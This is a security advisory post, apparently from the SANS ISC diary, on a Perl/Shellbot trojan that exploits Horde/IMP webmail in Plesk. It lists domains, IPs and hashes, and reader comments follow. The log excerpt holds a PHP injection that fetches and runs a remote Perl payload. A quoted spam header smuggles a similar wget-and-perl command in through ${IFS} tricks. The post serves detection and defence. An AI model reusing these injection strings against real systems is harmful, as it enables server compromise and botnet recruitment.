Active Perl/Shellbot Trojan
ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png[1]. The trojan has limited detection on Virustotal [2] and the script contains a “hostauth” of sosick[.]net[3] and the IRC server where the compromised systems are connecting to is located at 89.248.172.144. What we have so far, it appears it is exploiting older version of Plesk.
Update
This Bot exploit a vulnerability in Horde/IMP Plesk webmail, you might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info which appears to be exploiting a Plesk [4] vulnerability and maybe other to connect to 93.174.88.125 which a lot of activity has been reported to DShield for the past 3 days.
Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
If a system is compromised, you are likely going to see similar Apache processes:
apache 10760 0.0 0.0 10816 1084 ? S 11:09 0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache 10761 0.0 0.0 42320 1392 ? S 11:09 0:00 wget http://fallencrafts.info/download/himad.png
md5: bca0b2a88338427ba2e8729e710122cd himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9 himad.png
[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
Comments
I have no idea, how that command shall be executed, at least my postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail, because it was identified as spam and redirected), the intended target is not the mail client.
Find attached the mail including headers (two header lines with only local information removed):
Return-path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
Received: from localhost (localhost [127.0.0.1])
by mail.######.de (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
MISSING_DATE=1.36, MISSING_HEADERS=1.021, MISSING_MID=0.497,
MISSING_SUBJECT=1.799, RDNS_NONE=0.793, TO_NO_BRKTS_NORDNS=0.001]
autolearn=no
Received: from mail.######.de ([127.0.0.1])
by localhost (mail.######.de [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [1.234.45.84])
by mail.######.de (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <20131104155812.6E6AB482E1@mail.######.de>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com
x
Anonymous
Nov 5th 2013
1 decade ago
Anonymous
Nov 5th 2013
1 decade ago